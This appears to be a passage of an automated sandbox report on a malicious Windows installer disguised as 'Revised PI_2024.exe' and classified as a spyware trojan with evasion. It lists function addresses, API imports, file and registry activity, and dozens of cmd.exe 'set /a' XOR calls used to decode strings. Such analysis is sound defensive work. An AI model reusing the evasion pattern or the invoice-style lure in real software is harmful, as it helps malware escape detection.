            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_004030E2 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030E2
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_004030E2 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,131_2_004030E2
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_0040480C0_2_0040480C
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_004062CF0_2_004062CF
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_00406AA60_2_00406AA6
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0040480C131_2_0040480C
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_004062CF131_2_004062CF
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_00406AA6131_2_00406AA6
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0015C074131_2_0015C074
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_00156108131_2_00156108
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0015C350131_2_0015C350
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0015E438131_2_0015E438
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0015C630131_2_0015C630
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_00156730131_2_00156730
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0015B798131_2_0015B798
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_00159858131_2_00159858
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0015BAB0131_2_0015BAB0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_00154AD9131_2_00154AD9
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0015BD93131_2_0015BD93
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0015AF28131_2_0015AF28
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0015B0F0131_2_0015B0F0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_00153578131_2_00153578
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0015F780131_2_0015F780
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0015D7F8131_2_0015D7F8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0015D7E7131_2_0015D7E7
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_0015FBF0131_2_0015FBF0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFFB50131_2_33EFFB50
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF7710131_2_33EF7710
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF4A53131_2_33EF4A53
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF0D60131_2_33EF0D60
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFB0B8131_2_33EFB0B8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF3410131_2_33EF3410
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF6F88131_2_33EF6F88
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF6F79131_2_33EF6F79
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFFB40131_2_33EFFB40
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFD308131_2_33EFD308
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF7F06131_2_33EF7F06
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFAB10131_2_33EFAB10
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFF6E9131_2_33EFF6E9
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFD2F9131_2_33EFD2F9
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFF6F8131_2_33EFF6F8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFBEA2131_2_33EFBEA2
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFF2A0131_2_33EFF2A0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFF290131_2_33EFF290
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFEE48131_2_33EFEE48
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFEE3A131_2_33EFEE3A
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFCE31131_2_33EFCE31
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFE9E0131_2_33EFE9E0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF75F8131_2_33EF75F8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFE9F0131_2_33EFE9F0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFE588131_2_33EFE588
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFE598131_2_33EFE598
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF7574131_2_33EF7574
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFE140131_2_33EFE140
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF0D51131_2_33EF0D51
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFE131131_2_33EFE131
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF7930131_2_33EF7930
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF0900131_2_33EF0900
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFDCE8131_2_33EFDCE8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF08F1131_2_33EF08F1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFDCD8131_2_33EFDCD8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFA8AA131_2_33EFA8AA
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EFB0A8131_2_33EFB0A8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF04A0131_2_33EF04A0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF0490131_2_33EF0490
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF0040131_2_33EF0040
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF0006131_2_33EF0006
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF8000131_2_33EF8000
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_33EF3400131_2_33EF3400
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BD240131_2_360BD240
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BD890131_2_360BD890
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B38B8131_2_360B38B8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BDEE0131_2_360BDEE0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BAD08131_2_360BAD08
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BB910131_2_360BB910
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BE530131_2_360BE530
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B9750131_2_360B9750
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BBF60131_2_360BBF60
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BEB78131_2_360BEB78
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BC5A8131_2_360BC5A8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BCBF0131_2_360BCBF0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B3008131_2_360B3008
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BA000131_2_360BA000
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B0006131_2_360B0006
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B8A10131_2_360B8A10
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B5E20131_2_360B5E20
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B8A20131_2_360B8A20
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B5E30131_2_360B5E30
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BD236131_2_360BD236
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BA44A131_2_360BA44A
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B1A41131_2_360B1A41
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B0040131_2_360B0040
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BA458131_2_360BA458
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B1A50131_2_360B1A50
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B3450131_2_360B3450
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B8E6A131_2_360B8E6A
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B3460131_2_360B3460
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B8E78131_2_360B8E78
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B048A131_2_360B048A
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B7888131_2_360B7888
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BD880131_2_360BD880
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B1E98131_2_360B1E98
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B0498131_2_360B0498
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B7898131_2_360B7898
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B5AAB131_2_360B5AAB
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B38A9131_2_360B38A9
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B1EA8131_2_360B1EA8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BA8A0131_2_360BA8A0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B5AB8131_2_360B5AB8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BA8B0131_2_360BA8B0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B92C0131_2_360B92C0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BDEDE131_2_360BDEDE
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B92D0131_2_360B92D0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B08E0131_2_360B08E0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BACFA131_2_360BACFA
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B08F0131_2_360B08F0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B22F0131_2_360B22F0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B4F0A131_2_360B4F0A
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B7D09131_2_360B7D09
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B2300131_2_360B2300
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BB900131_2_360BB900
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B7D18131_2_360B7D18
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BE523131_2_360BE523
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B6B20131_2_360B6B20
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B0D38131_2_360B0D38
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B6B30131_2_360B6B30
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B0D48131_2_360B0D48
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B9740131_2_360B9740
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B2758131_2_360B2758
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B2752131_2_360B2752
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BBF51131_2_360BBF51
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BEB69131_2_360BEB69
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B8161131_2_360B8161
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B8170131_2_360B8170
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B9B99131_2_360B9B99
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BC598131_2_360BC598
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B1190131_2_360B1190
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B2BA8131_2_360B2BA8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B9BA8131_2_360B9BA8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B11A0131_2_360B11A0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B85B8131_2_360B85B8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B2BB0131_2_360B2BB0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B4FB0131_2_360B4FB0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B85C8131_2_360B85C8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360BCBDF131_2_360BCBDF
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B15E8131_2_360B15E8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B15F8131_2_360B15F8
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B2FFC131_2_360B2FFC
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_360B9FF0131_2_360B9FF0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_36DD68F0131_2_36DD68F0
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_36DD0040131_2_36DD0040
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_36DD0011131_2_36DD0011
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_36DE1440131_2_36DE1440
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 131_2_36DE1401131_2_36DE1401
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: String function: 004029FD appears 49 times
            Source: Revised PI_2024.exe, 00000000.00000002.82255661462.0000000000440000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameopsplitningen.exeH vs Revised PI_2024.exe
            Source: Revised PI_2024.exe, 00000083.00000000.82181094604.0000000000440000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameopsplitningen.exeH vs Revised PI_2024.exe
            Source: Revised PI_2024.exe, 00000083.00000002.86892283444.0000000033B77000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Revised PI_2024.exe
            Source: Revised PI_2024.exeBinary or memory string: OriginalFilenameopsplitningen.exeH vs Revised PI_2024.exe
            Source: Revised PI_2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@389/7@5/5
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_004042DD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042DD
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
            Source: C:\Users\user\Desktop\Revised PI_2024.exeFile created: C:\Users\user\AppData\Local\haandsbredderneJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Revised PI_2024.exeFile created: C:\Users\user\AppData\Local\Temp\nsf2A49.tmpJump to behavior
            Source: Revised PI_2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Revised PI_2024.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Revised PI_2024.exeReversingLabs: Detection: 60%
            Source: C:\Users\user\Desktop\Revised PI_2024.exeFile read: C:\Users\user\Desktop\Revised PI_2024.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Revised PI_2024.exe "C:\Users\user\Desktop\Revised PI_2024.exe"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
